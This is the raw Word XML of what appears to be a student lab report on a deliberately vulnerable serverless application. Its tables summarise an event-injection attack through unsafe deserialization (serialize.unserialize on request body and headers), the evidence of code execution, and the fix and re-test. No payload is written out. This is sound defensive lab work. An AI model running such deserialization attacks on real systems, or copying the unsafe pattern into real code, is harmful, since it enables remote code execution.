                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="671195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA7AFE" w14:textId="42D3099B" w:rsidR="00332928" w:rsidRPr="009B6FC5" w:rsidRDefault="00332928" w:rsidP="00332928">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35244F42" wp14:editId="43B8AE96">
            <wp:extent cx="5274310" cy="1172210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="86496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6515" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1172210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A9468" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 9) Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D4543" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Table 1: Structured analysis summary — Table A</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1691"/>
        <w:gridCol w:w="1623"/>
        <w:gridCol w:w="1665"/>
        <w:gridCol w:w="1652"/>
        <w:gridCol w:w="1665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452A43" w:rsidRPr="009B6FC5" w14:paraId="7829F0DB" w14:textId="77777777" w:rsidTr="009022F1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E770CB4" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="382F4EDA" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09F0C59C" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74D99EED" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Normal Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BB2DF36" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Exploit Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452A43" w:rsidRPr="009B6FC5" w14:paraId="37FDEF46" w14:textId="77777777" w:rsidTr="009022F1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C0A0461" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Lesson #1: Event Injection / Lesson #9: Vulnerable Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27570323" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>The order API must treat request body and headers as normal data only. User input must never be executed as code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50201FF8" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>order-manager.js source code, API Gateway stage details, terminal output, CloudWatch logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B774727" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>The intended flow is that API Gateway sends the request to DVSA-ORDER-MANAGER, which reads the request and processes only valid data fields.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29F1B01C" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>The crafted request caused backend code execution, proven by the CloudWatch log message FILE READ SUCCESS: You are reading the contents of my hacked file!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23D126C0" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C850D1" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Table 2: Structured analysis summary — Table B</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1042"/>
        <w:gridCol w:w="1097"/>
        <w:gridCol w:w="852"/>
        <w:gridCol w:w="2261"/>
        <w:gridCol w:w="2246"/>
        <w:gridCol w:w="798"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452A43" w:rsidRPr="009B6FC5" w14:paraId="042F6166" w14:textId="77777777" w:rsidTr="009022F1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D13D31" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A253D6A" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Why This Is a Deviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31B209B0" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162A7A49" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Fix Applied (Where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A1F1B9" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DC330AE" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Optional Latency Before / After Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452A43" w:rsidRPr="009B6FC5" w14:paraId="5AE049D9" w14:textId="77777777" w:rsidTr="009022F1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B845E5" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>Lesson #1: Event Injection / Lesson #9: Vulnerable Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405E32BD" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve">The backend used unsafe deserialization, so attacker input was treated as code </w:t>
            </w:r>
            <w:r w:rsidRPr="009B6FC5">
              <w:lastRenderedPageBreak/>
              <w:t>instead of data. This breaks the intended security rule of safe input handling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78CD609D" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:lastRenderedPageBreak/>
              <w:t>Intentional misuse / security-relevant abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A004CB6" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve">In DVSA-ORDER-MANAGER (order-manager.js), </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>serialize.unserialize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>event.body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve">) was replaced with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>JSON.parse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>event.body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>|| "{}</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve">"); </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>serialize.unserialize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>event.headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve">) was </w:t>
            </w:r>
            <w:r w:rsidRPr="009B6FC5">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">replaced with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>event.headers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve"> || {}; and a missing authorization header check was added before token parsing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="788BCEAF" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">After the fix, the same crafted request </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>returned {"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>status":"err","message":"Missing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve"> authorization </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t>header"}</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B6FC5">
              <w:t xml:space="preserve"> and CloudWatch no longer </w:t>
            </w:r>
            <w:r w:rsidRPr="009B6FC5">
              <w:lastRenderedPageBreak/>
              <w:t>showed FILE READ SUCCESS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2685176C" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="009B6FC5">
              <w:lastRenderedPageBreak/>
              <w:t>Not measured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="697DEBD6" w14:textId="77777777" w:rsidR="00452A43" w:rsidRPr="009B6FC5" w:rsidRDefault="00452A43" w:rsidP="00452A43">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0844B710" w14:textId="77777777" w:rsidR="0090295C" w:rsidRPr="009B6FC5" w:rsidRDefault="0090295C" w:rsidP="0090295C">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>Part 10) Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506162F4" w14:textId="70687943" w:rsidR="00082DA8" w:rsidRPr="009B6FC5" w:rsidRDefault="0090295C" w:rsidP="0090295C">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:t>This lesson showed that the main problem was trusting unsafe input and an unsafe package in the backend Lambda. This is important in a serverless environment because even one vulnerable function can execute attacker input and affect other AWS resources. A safer design is to treat all user input as data only, validate it strictly, and avoid risky dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394535A" w14:textId="28EC5F00" w:rsidR="009B6FC5" w:rsidRPr="009B6FC5" w:rsidRDefault="00082DA8" w:rsidP="00AF1655">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B6FC5">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300E504" w14:textId="1C4E8BC6" w:rsidR="00082DA8" w:rsidRPr="009B6FC5" w:rsidRDefault="00082DA8">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00082DA8" w:rsidRPr="009B6FC5" w:rsidSect="00CC00E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745"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10C22D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11452"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8228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C254AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5788B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B12905"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C73E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506397">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="480196739">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1133711126">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1476678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B1"/>
    <w:rsid w:val="00001851"/>
    <w:rsid w:val="000065F6"/>
    <w:rsid w:val="0004282E"/>
    <w:rsid w:val="000772F1"/>
    <w:rsid w:val="00082DA8"/>
    <w:rsid w:val="000E2EA5"/>
    <w:rsid w:val="001111EA"/>
    <w:rsid w:val="001A6C05"/>
    <w:rsid w:val="001D2C78"/>
    <w:rsid w:val="001E7390"/>
    <w:rsid w:val="00332928"/>
    <w:rsid w:val="003537A0"/>
    <w:rsid w:val="003B0807"/>
    <w:rsid w:val="00452A43"/>
    <w:rsid w:val="00456791"/>
    <w:rsid w:val="00473776"/>
    <w:rsid w:val="004A257A"/>
    <w:rsid w:val="00523CE9"/>
    <w:rsid w:val="005828B1"/>
    <w:rsid w:val="007735EC"/>
    <w:rsid w:val="007F0181"/>
    <w:rsid w:val="0083566E"/>
    <w:rsid w:val="00860E50"/>
    <w:rsid w:val="0086236D"/>
    <w:rsid w:val="008A564F"/>
    <w:rsid w:val="008A66D9"/>
    <w:rsid w:val="0090295C"/>
    <w:rsid w:val="00943525"/>
    <w:rsid w:val="009615E7"/>
    <w:rsid w:val="009B6FC5"/>
    <w:rsid w:val="00A66AA2"/>
    <w:rsid w:val="00AA2209"/>
    <w:rsid w:val="00AB52AA"/>
    <w:rsid w:val="00AF1655"/>
    <w:rsid w:val="00B17B64"/>
    <w:rsid w:val="00BB5258"/>
    <w:rsid w:val="00BC35FE"/>
    <w:rsid w:val="00C517FF"/>
    <w:rsid w:val="00CC00EC"/>
    <w:rsid w:val="00D625B9"/>
    <w:rsid w:val="00E33F60"/>
    <w:rsid w:val="00EF5725"/>
    <w:rsid w:val="00F34140"/>
    <w:rsid w:val="00F478A3"/>
    <w:rsid w:val="00F735DC"/>
    <w:rsid w:val="00F74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6E4E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E09E01FD-8048-49B7-88A1-B82DB70D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82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2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2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8B1"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0058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8B1"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="005828B1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005828B1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="005828B1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00582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8B1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="005828B1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00452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950</Words>
  <Characters>5418</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>45</Lines>
  <Paragraphs>12</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BAKRI MASLMANI</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HUSAM BAKRI MASLMANI</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-04T19:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T19:58:00Z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89a21c2d-b8bb-4f97-80fb-6a2c10f5a0c5</vt:lpwstr>
  </property>
</Properties>
</file>